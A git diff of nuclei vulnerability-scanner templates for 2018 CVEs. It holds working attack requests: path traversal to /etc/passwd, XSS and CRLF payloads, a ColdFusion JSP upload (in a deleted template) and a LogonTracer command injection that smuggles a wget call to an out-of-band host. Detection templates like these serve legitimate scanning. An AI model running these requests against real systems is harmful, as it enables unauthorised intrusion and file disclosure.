"{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - 'webgrind' + condition: and + + - type: status + status: + - 200 +# digest: 490a00463044022039cf28a7d017785e7ae6c8930010bd0a7a23aba9ba82336e80ce2a2202500afd02203e606922ed51c242bc1ee629aa166cd3bd867dc4704ca230d421533b72b9223b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml deleted file mode 100644 index 40cfb44af3..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-13980 - -info: - name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion - author: wisnupramoedya - severity: medium - description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. - reference: - - https://www.exploit-db.com/exploits/45016 - - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ - - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2018-13980 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14013.yaml b/nuclei-templates/CVE-2018/CVE-2018-14013.yaml index cb17962655..cee7520213 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-14013.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-14013.yaml @@ -1,33 +1,34 @@ id: CVE-2018-14013 + info: name: Zimbra XSS author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-14013 - - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - - https://bugzilla.zimbra.com/show_bug.cgi?id=109018 - - https://bugzilla.zimbra.com/show_bug.cgi?id=109017 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 + tags: cve,cve2018,xss,zimbra classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-14013 cwe-id: CWE-79 - tags: cve,cve2018,xss,zimbra + requests: - method: GET path: - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word words: - '' part: body + - type: status status: - 200 + - type: word part: header words: diff --git a/nuclei-templates/CVE-2018/CVE-2018-14064.yaml b/nuclei-templates/CVE-2018/CVE-2018-14064.yaml deleted file mode 100644 index 5e29e1cb36..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14064.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-14064 -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: critical - description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. - reference: - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-14064 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,camera,iot -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14502.yaml b/nuclei-templates/CVE-2018/CVE-2018-14502.yaml index 76679bb452..f77f833be9 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-14502.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-14502.yaml @@ -1,31 +1,46 @@ id: CVE-2018-14502 info: - name: Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection - author: akincibor + name: > + Chained Quiz <= 1.0.8.2 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. + description: > + controllers/quizzes.php in the Kiboko Chained Quiz plugin before 1.0.9 for WordPress allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. reference: - - https://wpscan.com/vulnerability/9112 - tags: cve,cve2018,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6ef0c41-e498-4de6-a86a-d23f65a7a824?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-14502 + metadata: + fofa-query: "wp-content/plugins/chained-quiz/" + google-query: inurl:"/wp-content/plugins/chained-quiz/" + shodan-query: 'vuln:CVE-2018-14502' + tags: cve,wordpress,wp-plugin,chained-quiz,critical -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt' + - "{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "Chained Quiz" + - "chained-quiz" part: body - type: dsl dsl: - - compare_versions(version, '< 1.0.9') \ No newline at end of file + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-14574.yaml b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml new file mode 100644 index 0000000000..18f87e359a --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-14574 + +info: + name: Django Open Redirect + author: pikpikcu + severity: medium + tags: cve,cve2018,django,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14574 + cwe-id: CWE-601 + description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect." + reference: + - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ + - https://usn.ubuntu.com/3726-1/ + - http://www.securitytracker.com/id/1041403 + - https://www.debian.org/security/2018/dsa-4264 + - http://www.securityfocus.com/bid/104970 + - https://access.redhat.com/errata/RHSA-2019:0265 + +requests: + - method: GET + path: + - "{{BaseURL}}//www.example.com" + + matchers-condition: and + matchers: + - type: status + status: + - 301 + - type: word + words: + - "Location: https://www.example.com" + - "Location: http://www.example.com" + part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-14918.yaml b/nuclei-templates/CVE-2018/CVE-2018-14918.yaml new file mode 100644 index 0000000000..882b57bf37 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-14918.yaml @@ -0,0 +1,50 @@ +id: CVE-2018-14918 + +info: + name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. + reference: + - https://seclists.org/fulldisclosure/2019/Apr/12 + - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-14918 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/HimmelAward/Goby_POC + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-14918 + cwe-id: CWE-22 + epss-score: 0.44897 + epss-percentile: 0.97077 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: loytec + product: lgate-902_firmware + shodan-query: http.html:"LGATE-902" + tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss + +http: + - method: GET + path: + - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-15138.yaml b/nuclei-templates/CVE-2018/CVE-2018-15138.yaml deleted file mode 100644 index 7de14fe8b9..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15138.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-15138 - -info: - name: LG-Ericsson iPECS NMS 30M - Local File Inclusion - author: 0x_Akoko - severity: high - description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs. - reference: - - https://cxsecurity.com/issue/WLB-2018080070 - - https://www.exploit-db.com/exploits/45167/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-15138 - cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" - - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml index 0fa74f21ac..2392e8714b 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml @@ -1,28 +1,28 @@ id: CVE-2018-15473 - info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 + - https://bugs.debian.org/906236 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-15473 cwe-id: CWE-362 tags: network,openssh,cve,cve2018 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' - extractors: - type: regex regex: diff --git a/nuclei-templates/CVE-2018/cve-2018-15517.yaml b/nuclei-templates/CVE-2018/CVE-2018-15517.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15517.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15517.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15640.yaml b/nuclei-templates/CVE-2018/CVE-2018-15640.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15640.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15640.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml index 7840581824..9e75ab5103 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml @@ -13,12 +13,10 @@ info: cve-id: CVE-2018-15657 cwe-id: CWE-918 tags: cve,cve2018,suremdm,lfi - requests: - method: GET path: - "{{BaseURL}}/api/DownloadUrlResponse.ashx?url=file://C:/windows/win.ini" - stop-at-first-match: true matchers: - type: word diff --git a/nuclei-templates/CVE-2018/cve-2018-15745.yaml b/nuclei-templates/CVE-2018/CVE-2018-15745.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15745.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15745.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15917.yaml b/nuclei-templates/CVE-2018/CVE-2018-15917.yaml index bc9ce06c38..507df95ba1 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-15917.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-15917.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/45338 - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 - https://github.com/bbalet/jorani/issues/254 + - https://github.com/JavierOlmedo/JavierOlmedo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2018-15917 cwe-id: CWE-79 - epss-score: 0.05086 - epss-percentile: 0.92074 + epss-score: 0.04217 + epss-percentile: 0.92046 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +27,7 @@ info: vendor: jorani_project product: jorani shodan-query: title:"Login - Jorani" - tags: cve,cve2018,jorani,xss + tags: cve,cve2018,jorani,xss,jorani_project http: - raw: @@ -54,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100df2f1a0e4cbeb355a64a504f07c667baada95184d9da1eb29b2e42c960b670bc022071ef50eb71711b6f7e711af0d7e31f6f85a3927461da4c61b02cc22cb3084ca1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-15961.yaml b/nuclei-templates/CVE-2018/CVE-2018-15961.yaml deleted file mode 100644 index dcb8d6ce4f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15961.yaml +++ /dev/null @@ -1,71 +0,0 @@ -id: CVE-2018-15961 - -info: - name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution - author: SkyLark-Lab,ImNightmaree - severity: critical - description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - - https://github.com/xbufu/CVE-2018-15961 - - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-15961 - cwe-id: CWE-434 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev - -requests: - - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" - Content-Type: image/jpeg - - <%@ page import="java.util.*,java.io.*"%> - <%@ page import="java.security.MessageDigest"%> - <% - String cve = "CVE-2018-15961"; - MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); - alg.update(cve.getBytes()); - byte[] digest = alg.digest(); - StringBuffer hashedpasswd = new StringBuffer(); - String hx; - for (int i=0;i - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" - - {{randstr}}.jsp - -----------------------------24464570528145-- - - - | - GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - - type: word - words: - - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2018/cve-2018-16059.yaml b/nuclei-templates/CVE-2018/CVE-2018-16059.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16059.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16059.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16139.yaml b/nuclei-templates/CVE-2018/CVE-2018-16139.yaml index 7914e0aad4..bcc16fdd8f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16139.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16139.yaml @@ -6,20 +6,32 @@ info: severity: medium description: | BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability. reference: - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html - https://nvd.nist.gov/vuln/detail/CVE-2018-16139 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-16139 cwe-id: CWE-79 + epss-score: 0.00135 + epss-percentile: 0.47838 + cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: bibliosoft + product: bibliopac shodan-query: title:"Bibliopac" - verified: "true" tags: cve,cve2018,xss,bibliopac,bibliosoft -requests: +http: - method: GET path: - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=">' @@ -39,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-16159.yaml b/nuclei-templates/CVE-2018/CVE-2018-16159.yaml index 4d7a296e5a..5880a66046 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16159.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16159.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: Fixed in version 4.1.8. reference: - https://wpscan.com/vulnerability/9117 @@ -18,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16159 cwe-id: CWE-89 - epss-score: 0.01247 - epss-percentile: 0.83951 + epss-score: 0.01228 + epss-percentile: 0.85084 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress - tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin + tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a0047304502204db9de27da4355303ce3f26b3965d0ac9ef7cd8f1d426322fc388101ad5e26d8022100fed92ddd286d58f1427af079347b6a48d343009bd603538ba5b99c5cec1c280d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml index 3fdc81c692..905c2aa927 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16167.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml @@ -1,20 +1,20 @@ id: CVE-2018-16167 + info: - name: LogonTracer <=1.2.0 - Remote Command Injection + name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - - https://jvn.jp/en/vu/JVNVU98026636/index.html - - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 + tags: cve,cve2018,logontracer,rce,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-16167 cwe-id: CWE-78 - tags: cve,cve2018,logontracer,rce,oast + requests: - raw: - | @@ -23,11 +23,10 @@ requests: Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/cve-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16288.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16288.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16299.yaml b/nuclei-templates/CVE-2018/CVE-2018-16299.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16299.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16299.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16670.yaml b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml index b253aecfda..f9157661e3 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16670.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml @@ -8,11 +8,6 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,plc,iot,disclosure - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-16670 - cwe-id: CWE-287 requests: - method: GET diff --git a/nuclei-templates/CVE-2018/cve-2018-16763.yaml b/nuclei-templates/CVE-2018/CVE-2018-16763.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16763.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16763.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16979.yaml b/nuclei-templates/CVE-2018/CVE-2018-16979.yaml index 3d076ff28e..d47482ca8a 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16979.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16979.yaml @@ -1,24 +1,35 @@ id: CVE-2018-16979 info: - name: Monstra CMS V3.0.4 - HTTP Header Injection + name: Monstra CMS 3.0.4 - HTTP Header Injection author: 0x_Akoko severity: medium description: | - Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. + Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943. + impact: | + This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE). + remediation: | + Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability. reference: - https://github.com/howchen/howchen/issues/4 - https://nvd.nist.gov/vuln/detail/CVE-2018-16979 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-16979 cwe-id: CWE-113 + epss-score: 0.00141 + epss-percentile: 0.48943 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2018,crlf,mostra,mostracms,cms + verified: true + max-request: 1 + vendor: monstra + product: monstra + tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss -requests: +http: - method: GET path: - "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1" @@ -35,3 +46,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-17153.yaml b/nuclei-templates/CVE-2018/CVE-2018-17153.yaml index c21f23b526..2a1cad77ca 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-17153.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-17153.yaml @@ -6,25 +6,31 @@ info: severity: critical description: | It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to data theft or unauthorized control of the NAS. + remediation: | + Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability. reference: - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 + - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17153 cwe-id: CWE-287 - epss-score: 0.01264 + epss-score: 0.81607 + epss-percentile: 0.98273 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 - shodan-query: http.favicon.hash:-1074357885 vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware - verified: true - tags: 